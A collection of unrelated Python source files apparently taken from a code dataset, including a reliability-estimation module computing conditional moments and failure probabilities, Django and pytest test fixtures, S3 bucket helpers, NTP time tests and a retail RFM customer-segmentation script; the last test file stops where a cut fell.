import numpy as np
from scipy import stats
from .space import FullSpace
from duqo.proba import DS, MC, SUSE, ISPUD, FORM
from duqo.doe.lhs import make_doe
def _check_obj_wgt(obj_weights, num_obj):
""" Check obj_wgt argument passed to CondMom """
if obj_weights is None:
return None
try:
_ = obj_weights[0]
except (TypeError, IndexError):
obj_weights = np.ones(num_obj) * obj_weights
if len(obj_weights) != num_obj:
msg = f"Mismatch between the number of entries ({len(obj_weights)} in "
msg += f"obj_wgt and the number of stochastic objectives ({num_obj})."
raise ValueError(msg)
return np.array(obj_weights).ravel()
def _check_std_inds(use_std, num_obj):
""" Check use_std argument passed to CondMom and
convert it to a slice definition
"""
if isinstance(use_std, bool):
inds = [use_std] * num_obj
if len(inds) != num_obj:
msg = "Mismatch between the number of entries in "
msg += "use_std and the number of stochastic objectives."
raise ValueError(msg)
return np.array(use_std, dtype=bool)
def _find_integrator_cls(integrator):
"""
Find the Integrator class as defined by the string integrator
"""
integrator = integrator.upper()
if integrator == "DS":
IntCls = DS
elif integrator == "MC":
IntCls = MC
elif integrator == "ISPUD":
IntCls = ISPUD
elif integrator == "FORM":
IntCls = FORM
elif integrator == "SUSE":
IntCls = SUSE
else:
msg = f"Requested integrator {integrator} is not found."
raise ValueError(msg)
return IntCls
def _make_chain(methods: list):
"""Makes the chain given a list of method names"""
try:
first = methods[0]
except TypeError:
raise TypeError(f"methods must be a list of strings or classes, not {type(methods)}")
try:
_ = first.upper()
except AttributeError:
return methods
return [_find_integrator_cls(name.upper()) for name in methods]
def _n_para_chk(num_parallel: int = None):
""" Check the num_parallel argument as passed to CondProb """
n_procs = max(1, mp.cpu_count()) # could cpu_count ever be < 1?
if num_parallel is None or num_parallel > n_procs:
print(f"Number of parallel processes was set to {n_procs}")
return n_procs
return num_parallel
def _default_init(targ_prob: float, acc_max: float, num_inp: int,
num_para: int):
"""Decide the default integrator chain methods and arguments depending
on the problem
Parameters
----------
targ_prob : float
target failure probability
acc_max : float
target tolerance for the estimation
num_inp : int
number of stochastic inputs of the constraints
num_para : int
number of parallel processes to use
Returns
-------
integrators : list
Integrator classes, that are to be initiated
int_args : dict
Keyword arguments to pass to integrators
"""
if targ_prob * acc_max >= 1e-5:
if targ_prob * acc_max >= 1e-4:
integrators = ["MC"]
else:
integrators = ["SUSE", "MC"]
int_args = {"num_starts": 1, "batch_size": 1e5}
elif num_inp < 15:
integrators = ["SUSE", "DS"]
int_args = {"num_starts": 1}
else:
integrators = ["SUSE"]
int_args = {"num_starts": num_para}
print("Using", integrators, "as default chain.")
return integrators, int_args
def _is_worker(workers, name):
""" check if name is in workers list of classes"""
for worker in workers:
wname = read_integrator_name(worker)
if name.upper() in wname.upper():
return True
return False
def read_integrator_name(worker):
""" read the name of the integrator instance worker """
name = str(worker).split(".")[-1]
return "".join([c for c in name if c.isalnum()])
class CondMom:
"""Class to estimate conditional means
full_space : FullSpace instance
The definition of the optimization and stochastic spaces
base_doe : int or np.ndarray
set if a new doe should be calculated or the same one should
be transformed during the optimization.
if array, it should have zero mean and unit variance
but the original marginal distributions and correlation.
it should have same number of columns as stochastic variables
used in the objective. If integer, a base_doe with that number of
samples will be created
doe_size : int
The size of the doe to use. If base_doe is a numpy array, this
has no effect and doesn't have to be passed.
obj_wgt : float or iterable of floats:
If not None, these weights will be used for combining the
estimated mean and the variance/std. dev. If iterable, it
must be the same length as the number of stochastic input
variables as used for the objective function.
If None, the variances are returned separetly
use_std : bool or iterable of bools
Flag to use standard deviation (True) or the variance for the
estimation. If iterable, it must be the same length as the number
of stochastic input variables as used for the objective function.
"""
def __init__(self, full_space: FullSpace, base_doe: typing.Union[bool, np.ndarray] = True,
doe_size: int = 100, obj_wgt: typing.Optional[typing.Union[float, list, np.ndarray]] = None,
use_std: typing.Union[bool, list] = False):
self.full_space = full_space
num_obj = len(self.full_space.obj_inds["sto"])
self._use_std = _check_std_inds(use_std, num_obj)
self._obj_wgt = _check_obj_wgt(obj_wgt, num_obj)
self._doe_size = None
self._base_doe = None
self.doe_size = doe_size
self.base_doe = base_doe
@property
def base_doe(self):
"""Base doe to use for the moment estimation
Don't set this to an array with truncnorm and lognormal distributions
in the MultiVariate if you don't know exactly what you are doing.
"""
return self._base_doe
@base_doe.setter
def base_doe(self, new_doe):
"""Base doe to use for the moment estimation
Don't set this to an array with truncnorm and lognormal distributions
in the MultiVariate if you don't know exactly what you are doing.
"""
# Sanity checks for base_doe. Using parameters with multiple valid types
# may be an antipattern but it makes configuration easier from
# the user point of view. Tolerate this for a better user experience.
if isinstance(new_doe, np.ndarray):
if self._is_valid_base(new_doe): # raises errors
self._base_doe = new_doe.copy() # Make our copy.
return
try:
make_base_doe = bool(new_doe)
except ValueError:
return
if make_base_doe:
# Prepare doe with zero mean and unit variance
doe = self.full_space.inp_space.sto_obj_base_doe(self.doe_size)
self._base_doe = doe
return
# if not bool(new_doe); remake new doe so set base_doe to None
self._base_doe = None
return
def _is_valid_base(self, new_doe):
# Assume numpy array
n_sto_obj_inps = len(self.full_space.inp_space.inds["sto_obj"])
if new_doe.shape[1] != n_sto_obj_inps:
msg = "base_doe must be one of None, bool or a 2d array "
msg += f"with shape (num_samples, num_stochastic_objective_variables={n_sto_obj_inps})."
raise TypeError(msg)
if max(abs(new_doe.mean(0).max()), abs(1 - new_doe.std(0).max())) > 0.5:
msg = "base_doe must have zero mean and unit variance."
raise ValueError(msg)
return True
@property
def doe_size(self):
"""Size of the base doe to use for the moment estimation"""
return self._doe_size
@doe_size.setter
def doe_size(self, new_size):
"""Size of the base doe to use for the moment estimation"""
self._doe_size = new_size
if self.base_doe is not None:
self.base_doe = new_size
@property
def obj_wgt(self):
"""Weights for the linear combination of cond. moments"""
return self._obj_wgt
@obj_wgt.setter
def obj_wgt(self, new_obj_wgt):
"""Weights for the linear combination of cond. moments"""
n_obj = len(self.full_space.obj_inds["sto"])
self._obj_wgt = _check_obj_wgt(new_obj_wgt, n_obj)
@property
def use_std(self):
"""Indexes to use std. dev. instead of variance"""
return self._use_std
@use_std.setter
def use_std(self, new_std):
"""Indexes to use std. dev. instead of variance"""
n_obj = len(self.full_space.obj_inds["sto"])
self._use_std = _check_std_inds(new_std, n_obj)
def gen_doe(self, x_opt):
"""Get DoE for the Moment estimation for x_opt"""
if x_opt.ndim == 1:
x_opt = x_opt.reshape((1, -1))
if self.base_doe is None:
return self.full_space.inp_space.sto_obj_doe(x_opt, self._doe_size)
mean, std = self.full_space.inp_space.opt_moms(x_opt)
names = self.full_space.inp_space.mulvar.names
names = [names[i] for i in self.full_space.inp_space.mv_inds("sto_obj")]
# Translating is not sufficient for lognormal and truncated normal
inds = [i for i, x in enumerate(names) if "log" in x or "trunc" in x]
if not inds:
return self.base_doe * std + mean
# Handle Lognormal
binds = np.ones(self.base_doe.shape[1], dtype=bool)
binds[inds] = False
base_doe = self.base_doe.copy()
base_doe[:, binds] = base_doe[:, binds] * std[binds] + mean[binds]
mean = mean[inds]
std = std[inds]
cur_mv = self.full_space.inp_space.opt_mulvar(x_opt, domain="sto_obj")
for ind in inds:
base_doe[:, ind] = cur_mv.dists[ind].marg.ppf(base_doe[:, ind])
return base_doe
def est_mom(self, x_opt):
""" Estimate conditional moments for a single optimization point x_opt
Conditional moments are E[Y | x_opt] and Var[Y | x_opt]
Parameters
----------
x_opt : numpy.ndarray
the coordinates of the optimization variables to compute
the moments
Returns
-------
mus : numpy.ndarray
Estimated means, or if obj_wgt was not None,
the combined mu + obj_wgt * sigma
sigmas : numpy.ndarray
Estimated variances or std. dev. depending on the settings.
only returned if obj_wgt is None.
"""
if x_opt.ndim == 1:
x_opt = x_opt.reshape((1, -1))
doe = self.gen_doe(x_opt)
res = self.full_space.sto_obj(doe, x_opt)
mus = np.mean(res, axis=0)
sigmas = np.zeros(mus.shape)
std_inds = self.use_std
sigmas[std_inds] = np.std(res[:, std_inds], axis=0, ddof=1)
var_inds = np.logical_not(std_inds)
sigmas[var_inds] = np.var(res[:, var_inds], axis=0, ddof=1)
if self.obj_wgt is None:
return mus, sigmas
return mus + self.obj_wgt * sigmas
class CondProba:
"""A chain of integtrators for the calculation of the probability
This starts with a fast integrator to get an initial guess. If the
guess is too far away from target_pf, this stops further calculations
and returns the failure probability. Used for accelerating the
optimization process. Chains with a single element are also possible.
Parameters
----------
num_inputs : int
Number of stochastic inputs used for the constraints
target_fail_prob : float
Target failure probability. If unsure, just set it sufficiently low
i.e. >=1e-6. Note that Numerical unstabilities start at 1e-9 due to
scipy stats returning nans and infs
num_parallel : int
Number of parallel computations, if the used integrator supports it.
If passed, the entry in call_args will override this.
methods : None or list of str
Names of the methods to use for the estimation. If None, a default
chain will be selected depending the problem definition, which is
recommended for new users.
Currently the following names are supported:
MC - Crude Monte Carlo
DS - Directional simulation
FORM - First order reliability method
ISPUD - Importance sampling using design point (MPP)
call_args : None or list
keyword argument dict to pass to the integrator calc_prob_fail
as call arguments. Any argument in this will override the
initialization arguments with the same name i.e. target_fp and
num_parallel
target_tol : float
Target tolerance for the failure probability. Also used
for stopping the chain, if the computed failure probability
is either smaller than target_fp * target_tol or larger than
target_fp / target_tol.
"""
def __init__(self, target_fail_prob: float, num_inputs: int, num_parallel: int = 4,
methods: typing.Optional[typing.Union[str, list]] = None, call_args: typing.Optional[dict] = None,
target_tol: float = 0.01):
self.n_inp = num_inputs
num_para = _n_para_chk(num_parallel)
cargs = {"num_parallel": num_para, "multi_region": True}
if methods is None:
methods, cargs = _default_init(target_fail_prob, target_tol,
num_inputs, num_para)
if call_args is None:
self.call_args = {**cargs}
else:
self.call_args = {**cargs, **call_args}
self._tar_fp = target_fail_prob
self._tar_tol = target_tol
self.workers = _make_chain(methods)
self._prob_tol()
if "doe" in self.call_args.keys():
doe = self.call_args["doe"]
if doe.shape[1] != self.n_inp:
msg = f"Shape mismatch between the number of inputs ({self.n_inp}) "
msg += f"and the DoE {doe.shape[1]}"
raise ValueError()
mu_max = np.max(np.mean(doe, axis=0))
sig_max = np.max(np.std(doe, axis=0))
if abs(mu_max) > 1e-10 or abs(sig_max - 1) > 1e-10:
msg = "Zero mean and unit variance is required for doe "
msg += "in call_args, found mean == {mu_max} and "
msg += "sigma == {sig_max} columns"
raise ValueError(msg)
elif _is_worker(self.workers, "ISPUD"):
margs = [stats.norm() for k in range(self.n_inp)]
self.call_args["doe"] = make_doe(100, margs, num_tries=1000)
self.call_args["post_proc"] = False
self.call_args["num_parallel"] = num_para
@property
def target_fail_prob(self):
"""target failure probability"""
return self._tar_fp
@target_fail_prob.setter
def target_fail_prob(self, new_fp):
"""target failure probability"""
if new_fp <= 0 or new_fp > 0.9:
msg = "Target failure probability should lie in the interval (0,0.9]"
raise ValueError(msg)
self._tar_fp = new_fp
self._prob_tol()
@property
def target_tol(self):
"""Target accuracy for failure probability estimation"""
return self._tar_tol
@target_tol.setter
def target_tol(self, new_tol):
"""Target accuracy for failure probability estimation"""
if new_tol <= 0 or new_tol > 0.9:
msg = "Target probability accuracy should lie in the interval (0,0.9]"
raise ValueError(msg)
self._tar_tol = new_tol
self._prob_tol()
def _prob_tol(self):
prob_tol = self._tar_fp * self._tar_tol
if _is_worker(self.workers, "MC") and prob_tol < 1e-6:
msg = "Crude Monte Carlo can be very inefficient for "
msg += "such low probabilities of failure."
warnings.warn(msg)
self.call_args["prob_tol"] = prob_tol
def calc_fail_prob(self, input_mv, constraints, const_args, verbose: int = 0):
""" Calculate failure probability using the worker chain
Parameters
----------
input_mv : MultiVar instance
Definition of the multivariate input
constraints : list
constraint functions to initialize the integrator
const_args : None or list
arguments to pass to the constraints
Returns:
--------
pof : float
probability of failure
feasible : bool
pof <= target_pf
"""
if not self.workers:
raise ValueError("No estimators defined")
for worker in self.workers:
estimator = worker(input_mv, constraints, const_args)
try:
pof = estimator.calc_fail_prob(**self.call_args)[0]
except ValueError:
if worker == self.workers[-1]:
print("Fatal error while calculating probability of failure with", worker)
print(input_mv)
print("Setting it to 100%.")
pof = 1.
continue
if verbose > 1:
name = read_integrator_name(worker)
print(f"{name} estimated the failure probability as {pof:.2e}.")
if pof > self._tar_fp:
prob_ratio = self._tar_fp / pof
else:
prob_ratio = pof / self._tar_fp
if prob_ratio <= self._tar_tol:
break
if verbose > 0:
try:
name = read_integrator_name(worker)
print(f"{name} estimated the failure probability as {pof:.2e}.")
except NameError:
pass
return pof, pof <= self._tar_fp
| StarcoderdataPython |
3260103 | <gh_stars>0
from django.utils.functional import cached_property
from waldur_core.structure.tests.fixtures import ProjectFixture
from . import factories
class AWSFixture(ProjectFixture):
@cached_property
def service(self):
return factories.AWSServiceFactory(customer=self.customer)
@cached_property
def spl(self):
return factories.AWSServiceProjectLinkFactory(service=self.service, project=self.project)
@cached_property
def region(self):
return factories.RegionFactory()
@cached_property
def image(self):
return factories.ImageFactory(region=self.region)
@cached_property
def size(self):
size = factories.SizeFactory()
size.regions.add(self.region)
return size
@cached_property
def instance(self):
return factories.InstanceFactory(service_project_link=self.spl, region=self.region)
| StarcoderdataPython |
3276276 | <reponame>altazur/PythonAutomationExamples
import pytest
def test_soap_calc_add(get_calculator, soap_version):
assert get_calculator.add(1,5, soap_version) == str(6)
| StarcoderdataPython |
1768980 | import logging
from urllib.parse import urlparse
logger = logging.getLogger(__name__)
def is_s3_url(url):
"""
Check if url is an s3, s3n, or s3a url
"""
try:
return urlparse(url).scheme in ["s3", "s3n", "s3a"]
except ValueError:
return False
def create_s3_bucket_if_not_exists(bucket_name, region):
import boto3
from botocore.exceptions import ClientError
s3_client = boto3.client("s3", region)
try:
s3_client.get_bucket_acl(Bucket=bucket_name)
logger.debug("Found bucket %s in region %s already exist", bucket_name, region)
except ClientError as error:
if error.response and error.response["Error"]["Code"] == "NoSuchBucket":
logger.debug("Creating s3 bucket: %s in region %s", bucket_name, region)
# NOTE: boto3 will raise ClientError(InvalidLocationConstraint) if
# `LocationConstraint` is set to `us-east-1` region.
# https://github.com/boto/boto3/issues/125.
# This issue still show up in boto3 1.13.4(May 6th 2020)
try:
s3_client.create_bucket(
Bucket=bucket_name,
CreateBucketConfiguration={"LocationConstraint": region},
)
except ClientError as s3_error:
if (
s3_error.response
and s3_error.response["Error"]["Code"]
== "InvalidLocationConstraint"
):
logger.debug(
"Special s3 region: %s, will attempt create bucket without "
"`LocationConstraint`",
region,
)
s3_client.create_bucket(Bucket=bucket_name)
else:
raise s3_error
else:
raise error
| StarcoderdataPython |
1767752 | <reponame>scionrep/scioncc_new
__author__ = '<NAME> <<EMAIL>>'
from nose.plugins.attrib import attr
import time
import datetime
try:
import numpy as np
except ImportError:
np = None
from pyon.util.unit_test import PyonTestCase
from ion.util.ntp_time import NTP4Time
@attr('UNIT')
class NTP4TimeUnitTest(PyonTestCase):
def test_time_ntp_fidelity(self):
it1 = NTP4Time()
ntp_ts = it1.to_ntp64()
it2 = NTP4Time.from_ntp64(ntp_ts)
self.assertEquals(it1.seconds,it2.seconds)
self.assertTrue(np.abs(it1.useconds - it2.useconds) <= 1)
def test_time_string_fidelity(self):
it1 = NTP4Time()
ntp_str = it1.to_string()
it2 = NTP4Time.from_string(ntp_str)
self.assertEquals(it1.seconds,it2.seconds)
self.assertTrue(np.abs(it1.useconds - it2.useconds) <= 1)
def test_unix_time_fidelity(self):
ts = time.time()
it1 = NTP4Time(ts)
ts_2 = it1.to_unix()
self.assertTrue(np.abs(ts - ts_2) <= 1e-3)
def test_ntp_compatability(self):
unix_day = NTP4Time(datetime.datetime(1970, 1, 1))
self.assertEquals(unix_day.era, 0)
self.assertEquals(unix_day.seconds, 2208988800)
utc_day = NTP4Time(datetime.datetime(1972, 1, 1))
self.assertEquals(utc_day.era, 0)
self.assertEquals(utc_day.seconds, 2272060800)
millen_day = NTP4Time(datetime.datetime(2000, 1, 1))
self.assertEquals(millen_day.era, 0)
self.assertEquals(millen_day.seconds, 3155673600)
ntp_era1 = NTP4Time(datetime.datetime(2036, 2, 8))
self.assertEquals(ntp_era1.era, 1)
self.assertEquals(ntp_era1.seconds, 63104)
self.assertEquals(ntp_era1.to_unix(), 2086041600.)
| StarcoderdataPython |
120421 | <filename>data/retail-rfm.py
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#%%: import libraries
import pandas as pd
import numpy as np
import datetime as dt
import seaborn as sns
from sklearn.cluster import KMeans
from sklearn.decomposition import PCA
from sqlalchemy import create_engine
import matplotlib.pyplot as plt
import json
# Though the following import is not directly being used, it is required
# for 3D projection to work
#%% create functions for calculating scores by order
def scoreRecency(x,p,d): # low recency is best and is assigned 1+
if x <= d[p][0.25]:return 1
elif x <= d[p][0.50]:return 2
elif x <= d[p][0.75]:return 3
else:return 4
def scoreFrequency(x,p,d): # high frequency is best and is assigned 1
if x <= d[p][0.25]:return 4
elif x <= d[p][0.50]:return 3
elif x <= d[p][0.75]:return 2
else:return 1
def scoreMonetary(x,p,d): # high monetary is best and is assigned 1
if x <= d[p][0.25]:return 4
elif x <= d[p][0.50]:return 3
elif x <= d[p][0.75]:return 2
else:return 1
df_raw = pd.read_excel('retail-data.xlsx')
#%% drop duplicates and group by country and customer ID
df = df_raw.copy()
df.country.nunique()
df.country.unique()
#%% drop duplicates and group by country and customer ID
cc = df[['country','customerid']].drop_duplicates()
cc.groupby(['country'])['customerid']. \
aggregate('count').reset_index(). \
sort_values('customerid', ascending=False)
#%% remove customers without customer ID
df = df[pd.notnull(df['customerid'])]
df.isnull().sum(axis=0)
#%% ensure only positive quantities and prices
df.UnitPrice.min()
df.Quantity.min()
df = df[(df['Quantity']>0)]
#%% check unique value for each column
def unique_counts(df):
for i in df.columns:
count = df[i].nunique()
print(i, ": ", count)
unique_counts(df)
#%% add column for total price
df['TotalPrice'] = df['Quantity'] * df['UnitPrice']
#%% determine first and last order date
df['InvoiceDate'].min()
df['InvoiceDate'].max()
#%% establish day after last purchase as point of calculation for recency
now = dt.datetime(2011,12,10)
df['InvoiceDate'] = pd.to_datetime(df['InvoiceDate'])
#%% create RFM table
rfmTable = df.groupby('customerid').agg({
'InvoiceDate': lambda x: (now - x.max()).days, #recency
'InvoiceNo': lambda x: len(x), #frequency
'TotalPrice': lambda x: x.sum()}) #monetary
rfmTable['InvoiceDate'] = rfmTable['InvoiceDate'].astype(int)
#%% convert invoice date to integer and rename columns for RFM
rfmTable.rename(columns={
'InvoiceDate': 'recency_total',
'InvoiceNo': 'frequency_total',
'TotalPrice': 'monetary_total'}, inplace=True)
#%% shift rfmTable data to quantiles for segmentation
quantiles = rfmTable.quantile(q=[0.25,0.5,0.75])
quantiles = quantiles.to_dict()
quantiles
#%% create a segmented RFM table
rfmSegment = rfmTable.copy()
#%% create new columns for RFM and assign values based on quantile
rfmSegment['r_qt'] = rfmSegment['recency_total'].apply(scoreRecency, args=('recency_total',quantiles,))
rfmSegment['f_qt'] = rfmSegment['frequency_total'].apply(scoreFrequency, args=('frequency_total',quantiles,))
rfmSegment['m_qt'] = rfmSegment['monetary_total'].apply(scoreMonetary, args=('monetary_total',quantiles,))
#%% calculate total RFM score as string composed of individual RFM quantiles
rfmSegment['rfm'] = rfmSegment.r_qt.map(str) \
+ rfmSegment.f_qt.map(str) \
+ rfmSegment.m_qt.map(str)
#%% create categories from rfm
datacomb=[]
datacomb.append([3,3,1,"Big Spenders","331",7])
datacomb.append([1,2,1,"Big Spenders","121",7])
datacomb.append([1,3,1,"Big Spenders","131",7])
datacomb.append([1,4,1,"Big Spenders","141",7])
datacomb.append([2,2,1,"Big Spenders","221",7])
datacomb.append([2,3,1,"Big Spenders","231",7])
datacomb.append([2,4,1,"Big Spenders","241",7])
datacomb.append([3,2,1,"Big Spenders","321",7])
datacomb.append([3,4,1,"Big Spenders","341",7])
datacomb.append([4,2,1,"Big Spenders","421",7])
datacomb.append([4,3,1,"Big Spenders","431",7])
datacomb.append([2,1,1,"Loyal Customers-Big Spenders","211",6])
datacomb.append([3,1,1,"Almost Lost","311",4])
datacomb.append([1,1,1,"Best Customers","111",8])
datacomb.append([4,1,1,"Lost Customers","411",3])
datacomb.append([4,4,4,"Lost Cheap Customers","444",1])
datacomb.append([1,1,2,"Loyal Customers","112",5])
datacomb.append([1,1,3,"Loyal Customers","113",5])
datacomb.append([1,1,4,"Loyal Customers","114",5])
datacomb.append([2,1,2,"Loyal Customers","212",5])
datacomb.append([2,1,3,"Loyal Customers","213",5])
datacomb.append([2,1,4,"Loyal Customers","214",5])
datacomb.append([3,1,2,"Loyal Customers","312",5])
datacomb.append([3,1,3,"Loyal Customers","313",5])
datacomb.append([3,1,4,"Loyal Customers","314",5])
datacomb.append([4,1,2,"Loyal Customers","412",5])
datacomb.append([4,1,3,"Loyal Customers","413",5])
datacomb.append([4,1,4,"Loyal Customers","414",5])
datacomb.append([1,4,2,"Others","142",2])
datacomb.append([1,4,3,"Others","143",2])
datacomb.append([1,4,4,"Others","144",2])
datacomb.append([4,4,1,"Big Spenders","441",7])
datacomb.append([1,2,2,"Others","122",2])
datacomb.append([1,2,3,"Others","123",2])
datacomb.append([1,2,4,"Others","124",2])
datacomb.append([1,3,2,"Others","132",2])
datacomb.append([1,3,3,"Others","133",2])
datacomb.append([1,3,4,"Others","134",2])
datacomb.append([2,2,2,"Others","222",2])
datacomb.append([2,2,3,"Others","223",2])
datacomb.append([2,2,4,"Others","224",2])
datacomb.append([2,3,2,"Others","232",2])
datacomb.append([2,3,3,"Others","233",2])
datacomb.append([2,3,4,"Others","234",2])
datacomb.append([2,4,2,"Others","242",2])
datacomb.append([2,4,3,"Others","243",2])
datacomb.append([2,4,4,"Others","244",2])
datacomb.append([3,2,2,"Others","322",2])
datacomb.append([3,2,3,"Others","323",2])
datacomb.append([3,2,4,"Others","324",2])
datacomb.append([3,3,2,"Others","332",2])
datacomb.append([3,3,3,"Others","333",2])
datacomb.append([3,3,4,"Others","334",2])
datacomb.append([3,4,2,"Others","342",2])
datacomb.append([3,4,3,"Others","343",2])
datacomb.append([3,4,4,"Others","344",2])
datacomb.append([4,2,2,"Others","422",2])
datacomb.append([4,2,3,"Others","423",2])
datacomb.append([4,2,4,"Others","424",2])
datacomb.append([4,3,2,"Others","432",2])
datacomb.append([4,3,3,"Others","433",2])
datacomb.append([4,3,4,"Others","434",2])
datacomb.append([4,4,2,"Others","442",2])
datacomb.append([4,4,3,"Others","443",2])
dfdatacomb= pd.DataFrame(datacomb, columns=['r_qt','r_qt','r_qt', 'description', 'rfm', 'sort'])
#%% import data and clone working dataframe
#%% create data for month to display in chart detail
df_raw['year'] = df_raw['InvoiceDate'].dt.year
df_raw['month'] = df_raw['InvoiceDate'].dt.month
df_final= pd.DataFrame()
df_date = df_raw[['month','year']].drop_duplicates()
for k, r in df_date.iterrows():
#%% get number of unique countries and their names
df = df_raw [(df_raw['month']== r['month']) & (df_raw['year']== r['year'])]
df.country.nunique()
df.country.unique()
#%% drop duplicates and group by country and customer ID
cc = df[['country','customerid']].drop_duplicates()
cc.groupby(['country'])['customerid']. \
aggregate('count').reset_index(). \
sort_values('customerid', ascending=False)
#%% remove customers without customer ID
df = df[pd.notnull(df['customerid'])]
df.isnull().sum(axis=0)
#%% ensure only positive quantities and prices
df.UnitPrice.min()
df.Quantity.min()
df = df[(df['Quantity']>0)]
#%% check unique value for each column
def unique_counts(df):
for i in df.columns:
count = df[i].nunique()
print(i, ": ", count)
unique_counts(df)
#%% add column for total price
df['TotalPrice'] = df['Quantity'] * df['UnitPrice']
#%% determine first and last order date
df['InvoiceDate'].min()
df['InvoiceDate'].max()
#%% establish day after last purchase as point of calculation for recency
now = df['InvoiceDate'].max()
df['InvoiceDate'] = pd.to_datetime(df['InvoiceDate'])
#%% create RFM table
rfmTable = df.groupby(['customerid']).agg({
'InvoiceDate': lambda x: (now - x.max()).days, #recency
'InvoiceNo': lambda x: len(x), #frequency
'TotalPrice': lambda x: x.sum()}) #monetary
rfmTable['InvoiceDate'] = rfmTable['InvoiceDate'].astype(int)
#print(rfmTable)
#%% convert invoice date to integer and rename columns for RFM
rfmTable.rename(columns={
'InvoiceDate': 'recency',
'InvoiceNo': 'frequency',
'TotalPrice': 'monetary'}, inplace=True)
#%% shift rfmTable data to quantiles for segmentation
quantiles = rfmTable.quantile(q=[0.25,0.5,0.75])
quantiles = quantiles.to_dict()
#quantiles
#%% create a segmented RFM table
rfmSegment2 = rfmTable.copy()
#%% create new columns for RFM and assign values based on quantile
rfmSegment2['r_qt'] = rfmSegment2['recency'].apply(scoreRecency, args=('recency',quantiles,))
rfmSegment2['f_qt'] = rfmSegment2['frequency'].apply(scoreFrequency, args=('frequency',quantiles,))
rfmSegment2['m_qt'] = rfmSegment2['monetary'].apply(scoreMonetary, args=('monetary',quantiles,))
#%% calculate total RFM score as string composed of individual RFM quantiles
rfmSegment2['rfm'] = rfmSegment2.r_qt.map(str) \
+ rfmSegment2.f_qt.map(str) \
+ rfmSegment2.m_qt.map(str)
#%% translate raw RFM values to log values for plotting, common log
rfmSegment2 = rfmSegment2.assign(r_lg = lambda x: np.log10(x.recency))
rfmSegment2 = rfmSegment2.assign(r_lg = lambda x: np.log10(x.frequency))
rfmSegment2 = rfmSegment2.assign(r_lg = lambda x: np.log10(x.monetary))
rfmSegment2['month'] = r['month']
rfmSegment2['year'] = r['year']
rfmSegment2['customerid'] = rfmSegment2.index
df_final= df_final.append(rfmSegment2, ignore_index=True)
#df_final = df_final[df_final['customerid'].isin(bestCustomers['customerid'])].sort_values('monetary', ascending=False)
df_final = pd.merge(df_final, dfdatacomb, how='left', on=['rfm', 'rfm'])[['recency','frequency','monetary','rfm','customerid','month','year','sort']]
df_final['date']= df_final['month'].map(str) + " - " + df_final['year'].map(str)
dic = {}
rfmSegment['customerid'] = rfmSegment.index
for k, r in rfmSegment.iterrows():
#calculate score variation among last two month
rfmSegmentLoc = df_final[(df_final['customerid']==r['customerid'])]
if len(rfmSegmentLoc.index) > 1:
rfmSegment.loc[k, 'variation'] = rfmSegmentLoc.iloc[len(rfmSegmentLoc)-1][['sort']].iloc[0] - rfmSegmentLoc.iloc[len(rfmSegmentLoc)-2][['sort']].iloc[0]
else:
rfmSegment.loc[k,'variation'] = 0
#create dictionary for detail chart
dic.update({ str(int(r['customerid'])): {"customerid" : str(int(r['customerid'])) , "result":[
{
"labels": list(df_final[df_final['customerid']== r['customerid']] ['date']),
'datasets': [{'label': str(r['customerid']) , 'data':list(df_final[df_final['customerid']== r['customerid']] ['sort']), 'lineTension': 0.1,
'backgroundColor': 'rgba(75,192,192,0.4)',
'borderColor': 'rgba(75,192,192,1)', }]
},
{
"labels": list(df_final[df_final['customerid']== r['customerid']] ['date']),
'datasets': [{'label': "Customer ID " + str(r['customerid']) , 'data': list(df_final[df_final['customerid']== r['customerid']] ['recency']), 'lineTension': 0.1,
'backgroundColor': 'rgba(75,192,192,0.4)',
'borderColor': 'rgba(75,192,192,1)', }]
}
,
{
"labels": list(df_final[df_final['customerid']== r['customerid']] ['date']),
'datasets': [{'label': "Customer ID " + str(r['customerid']) , 'data': list(df_final[df_final['customerid']== r['customerid']] ['frequency']), 'lineTension': 0.1,
'backgroundColor': 'rgba(75,192,192,0.4)',
'borderColor': 'rgba(75,192,192,1)', }]
}
,
{
"labels": list(df_final[df_final['customerid']== r['customerid']] ['date']),
'datasets': [{'label': "Customer ID " + str(r['customerid']) , 'data': list(df_final[df_final['customerid']== r['customerid']] ['monetary']), 'lineTension': 0.1,
'backgroundColor': 'rgba(75,192,192,0.4)',
'borderColor': 'rgba(75,192,192,1)', }]
}
]}}
)
with open('rfmcustomersTimeSeries.json', 'w') as fp:
json.dump(dic, fp)
#%% variation among last 2 month
#%% create json files
#create json for doughnut chart
rfmSegment['customerid']=rfmSegment.index
rfmSegment= pd.merge(rfmSegment, dfdatacomb, how='left', on=['rfm', 'rfm'])
rfmSegment.index=rfmSegment['customerid']
rfmSegment[['recency_total','frequency_total','monetary_total','customerid','sort', 'description', 'rfm', 'variation']].to_json("rfmcustomers.json", orient='records')
#create json for table
rfmSegment.groupby(['sort','description']).size().reset_index(name='counts').to_json("rfmSegment.json", orient='records')
| StarcoderdataPython |
19477 | <filename>WD/Cwiczenia/rzymskie.py
rzymskie={'I':1,'II':2,'III':3,'IV':4,'V':5,'VI':6,'VII':7,'VIII':8}
print(rzymskie)
print('Jeden element slownika: \n')
print(rzymskie['I'])
| StarcoderdataPython |
2301 | <reponame>gribbg/x7-geom
"""
Simple file to validate that maketests is working. Call maketests via:
>>> from x7.shell import *; maketests('x7.sample.needs_tests')
"""
def needs_a_test(a, b):
return a+b
| StarcoderdataPython |
23352 | from go.apps.tests.view_helpers import AppViewsHelper
from go.base.tests.helpers import GoDjangoTestCase
class TestHttpApiViews(GoDjangoTestCase):
def setUp(self):
self.app_helper = self.add_helper(AppViewsHelper(u'http_api'))
self.client = self.app_helper.get_client()
def test_show_stopped(self):
"""
Test showing the conversation
"""
conv_helper = self.app_helper.create_conversation_helper(
name=u"myconv")
response = self.client.get(conv_helper.get_view_url('show'))
self.assertContains(response, u"<h1>myconv</h1>")
def test_show_running(self):
"""
Test showing the conversation
"""
conv_helper = self.app_helper.create_conversation_helper(
name=u"myconv", started=True)
response = self.client.get(conv_helper.get_view_url('show'))
self.assertContains(response, u"<h1>myconv</h1>")
def test_edit_view(self):
conv_helper = self.app_helper.create_conversation_helper()
conversation = conv_helper.get_conversation()
self.assertEqual(conversation.config, {})
response = self.client.post(conv_helper.get_view_url('edit'), {
'http_api-api_tokens': 'token',
'http_api-push_message_url': 'http://messages/',
'http_api-push_event_url': 'http://events/',
'http_api-metric_store': 'foo_metric_store',
}, follow=True)
self.assertRedirects(response, conv_helper.get_view_url('show'))
reloaded_conv = conv_helper.get_conversation()
self.assertEqual(reloaded_conv.config, {
'http_api': {
'push_event_url': 'http://events/',
'push_message_url': 'http://messages/',
